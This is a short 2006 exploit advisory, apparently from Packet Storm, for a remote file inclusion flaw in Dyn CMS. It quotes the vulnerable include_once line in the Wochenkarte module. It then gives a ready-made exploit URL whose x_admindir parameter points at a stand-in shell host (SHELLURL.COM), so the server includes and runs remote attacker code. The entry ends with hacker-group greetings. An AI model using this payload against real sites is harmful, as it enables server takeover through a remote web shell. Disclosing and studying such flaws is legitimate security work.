dynCMS.txt

2006-09-07T00:00:00
ID PACKETSTORM:49730
Type packetstorm
Reporter SHiKaA
Modified 2006-09-07T00:00:00

Description

                                        
                                            `#==============================================================================================  
#Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit  
#===============================================================================================  
#   
#Critical Level : Dangerous   
#   
#Venedor site : http://www.dyncms.com/   
#   
#Version : REleased   
#   
#================================================================================================  
#Bug in : 0_admin/modules/Wochenkarte/frontend/index.php  
#  
#Vlu Code :  
#--------------------------------  
# <?  
include_once($x_admindir."/modules/".$xmodulname."/frontend/tools.inc.php");  
#   
#  
#================================================================================================  
#  
#Exploit :  
#--------------------------------  
#  
#http://sitename.com/[Script Path]/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://SHELLURL.COM?  
#  
#================================================================================================  
#Discoverd By : SHiKaA  
#  
#Conatact : SHiKaA-[at]hotmail.com  
#  
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior  
==================================================================================================  
  
  
`